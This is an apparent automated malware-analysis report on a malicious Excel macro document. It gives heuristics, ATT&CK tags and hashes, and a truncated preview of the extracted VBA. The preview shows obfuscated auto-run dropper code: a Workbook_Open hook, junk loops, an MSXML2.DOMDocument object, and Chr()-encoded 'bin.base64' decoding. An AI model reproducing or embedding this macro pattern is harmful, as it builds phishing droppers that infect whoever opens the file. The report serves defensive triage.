MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1047 WMI
The OOXML file contains a Workbook_Open macro, a common technique for executing malicious VBA code upon opening the document. The VBA code uses CreateObject and Shell() calls, indicating an attempt to download and execute a secondary payload. The obfuscated nature of the script and the presence of a Workbook_Open macro suggest a downloader or droppper functionality.
Heuristics 6
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12257 bytes |
SHA-256: fad669978dff7e4526816b7d323a9844c5f6af4bcd3a2fcad37017d4e17ca8ca |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
IpTPSnlJyYH81sEb5q.cOBTj24E9KBIxWN7qEHJ
While 4 = 6058
Dim SorHYhO9rSgEm885H5Iq_AOwOM6mghNbVlCwf34Ak5Wom6eyYRxv6ZJRY53 As String
Wend
Dim JkkZI_DsA4IWN_G As Integer
While 18 = 4209
Dim DmiHRrEMMsbf5atWk_sY_cMjiLc5N4hu As String
Wend
Dim wUFnyuibdVKY As Integer
While 7 = 1682
Dim lfwiIuvNPr_iY9hEMJ8SJpsiSEhyZP4lQw7BX4ubGSc_OfMyKb As String
Wend
Dim MSW2M5wMNC As Integer
While 21 = 2831
Dim L6w_xbQkBfqSYeJzLmRw1rl8BiMXhBN As String
Wend
Dim JnqNKebPwNlwo As Integer
While 18 = 552
Dim u332pWqI4aKdRy7MM3B9PfnrO9TsVegN57KGpTqJS_OLdt2odBhU As String
Wend
Dim ixXMNIlpB7vX37i As Integer
While 15 = 7831
Dim Ulyf3JznKOZLdEnMS6KoFg83fq_HVQ1S As String
Wend
Dim gJfBoeoIrHK8 As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "IpTPSnlJyYH81sEb5q"
Dim u4GmJo2gxMAVl9cnaa7vG3kmLJY36W9yKSKbeVduo7aoa7M7TJ6y8dM2QcZ9N8kYNJIRvAG_6JEJZ6KN7ahuaI1q_SIB5e As String
Dim JMDjSkew1S7zRcGYSmIfGgBWruwPucp8VmApagdO4cS17xyXP5PV As String
Dim iYtmxYmOrsWsdc9_1QjoQx_uInInTdZoyZjt6n_8cWjzMxQvB6EDXYPuY9bIN85LQq3D2NCKKlK3LIfTUWkWXVOYHyT7J4rdaWge5M3v331vLWg As Integer
Function w6GiWrbapPbwn5_JIqQ4WFnSikhwPB67U9Ei(brchSRFIr1vyXxkdKhj2Z_sOOGWIH1KhGU2GBIkKHKvTTiaPDb7Wn5aV9MQK47A1oLpB5baB6XsMRW4ppF_p3x4L4eHx1YPKJ5oG2XTk_5ZO)
While 21 = 4304
Dim Rqrb6qaG9LA1Ur_eHFVwNIIgCSX75ETTG9HTgvu2x6Ry26Y As String
Wend
Dim AbLHVphpGfJXlQd As Integer
While 18 = 4873
Dim K22osUho8UTd8R1ToE4Wcr77nhQAwVVHjRtY As String
Wend
Dim KLCawMvBKjWPJdR As Integer
JMDjSkew1S7zRcGYSmIfGgBWruwPucp8VmApagdO4cS17xyXP5PV = "MsXMl" & "2.dOMDOCumEnt"
While 24 = 6088
Dim q4Ab45AIDg1j8K3ogZWb315ocJ5b84sl1DZoQQdAJB946lwyQ4y As String
Wend
Dim yvBYz8T8s_gKHw As Integer
While 10 = 5389
Dim Ms4tLWO5VPz2AszV_ICD4yxniq6RuAlyyEq33_Dfh3Yuh8 As String
Wend
Dim kFV4WHD3X4NIe As Integer
Dim Y3vXWb2KGzct9FEkJ35YgW7PRNnONsIdOH9_bU7pDo1MSw8QtAkumIbA5eEHwk7Wo9dzFAHy5NU1fr6dPVeLGXzEo7I6Ow
While 1 = 187
Dim Z7ITm_B5A7b9Eee_XCEkuSJXENptLR8m4hEks_Fg5AiI35Pmh39 As String
Wend
Dim HhtEuuMWSQ As Integer
While 15 = 3681
Dim rr9x_fY3OS5gotsAdJ7CJRREdUx9z8zsLmQ1JDzsMoln6j2_UsOCYPEX As String
Wend
Dim X2SrrYBQbK As Integer
Dim Pkg_DonhlHg_17MDWYWB_1LDG2gxD1HY8NuTH719Dxh8X1mwnhj_
While 8 = 6951
Dim TBa2zYTLydpnI3cxlEqwR6f3bQtFAw As String
Wend
Dim mSJtOygc3yq As Integer
While 14 = 325
Dim KajqtqYM4w5jo2WehXgoLKA1VbYlnOGL1EFd5Jri As String
Wend
Dim S2E_qse12R9_U As Integer
While 23 = 4690
Dim Ic9YsTQQwinnrriu3jVp7UTEAIl6gtTOCzqkFDK As String
Wend
Dim zZQfRZU8A6E8rkX As Integer
While 22 = 6341
Dim XwH3WhqTsBMWj2_7nxWfNoyBnoJk_avlnna4bLplG_gdDCuE_8aIS As String
Wend
Dim Hs8EMrW_TQOks5Y As Integer
Set Pkg_DonhlHg_17MDWYWB_1LDG2gxD1HY8NuTH719Dxh8X1mwnhj_ = CreateObject(JMDjSkew1S7zRcGYSmIfGgBWruwPucp8VmApagdO4cS17xyXP5PV)
While 28 = 8554
Dim EdZGtWHFS7k4DkA_lQher5U97NCtNNaSyp3b_Ahq9kmHlxRcSQmSJYqJHa As String
Wend
Dim IeTX1_ePDWq As Integer
While 10 = 6700
Dim g9jr1eFPLUH5iZ7kGHY9rSh1CUjsgmTs4uuR As String
Wend
Dim BjR3i36_Aiu8 As Integer
u4GmJo2gxMAVl9cnaa7vG3kmLJY36W9yKSKbeVduo7aoa7M7TJ6y8dM2QcZ9N8kYNJIRvAG_6JEJZ6KN7ahuaI1q_SIB5e = Chr(294 - 196) & Chr(270 - 165) & Chr(213 - 103) & Chr(67 - 21) & Chr(260 - 162) & Chr(147 - 50) & Chr(447 - 332) & Chr(319 - 218) & Chr(310 - 256) & Chr(234 - 182)
While 25 = 5360
Dim cVGnX8MYrod5Vri_X_wnmhgyeXyVcy As String
Wend
Dim bjkxDOL_evf3 As Integer
While 20 = 5888
Dim S5w8LIVDkh7RP5xRG_Hz52K4RhnRwRd_GtMkAgKn_XL4lQgGZ36elp As String
Wend
Dim Zs3nndDPRD6J As Integer
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 36864 bytes |
SHA-256: 291dc8ff8a1dc0cdaa84bd1e772d6233061a31b88012cfd3966b06e93e99b824 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.